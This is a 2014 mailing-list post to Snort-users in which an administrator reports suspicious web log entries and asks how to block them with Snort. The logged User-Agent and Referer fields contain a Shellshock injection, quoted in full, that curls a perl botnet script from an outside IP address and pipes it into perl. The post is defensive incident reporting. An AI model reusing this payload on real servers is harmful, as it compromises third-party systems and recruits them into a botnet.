[Snort-users] Odd http requests in the logs

Richard Geddes richardcgeddes at ...11827...
Sun Nov 2 23:23:51 EST 2014


Hello,

I received a few (9) events in my web logs with the following fields:

agent : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png |
perl"

referrer : "() { :; }; curl
http://202.28.77.53/~prajaks/310482/index.png | perl"

downloaded index.png, and it turns out to be a base64 encoded perl
script that has comments about a botnet.  It seems to target apache.

I'm using snort with snort VRT Rules on a pfsense firewall, and pfsense,
snort, and the snort rules are up-to-date

snort seems to be passing these requests on to my web server, and it
seems to me they should be blocked.

I don't know enough about how web servers and log handlers process this
data to determine if it's a threat.

Is there a way to tell snort to block http requests with these fields? 
The source of the malicious file should probably be regex'd  in case
there are alternate sources of this file.

Thanks,
Richard




More information about the Snort-users mailing list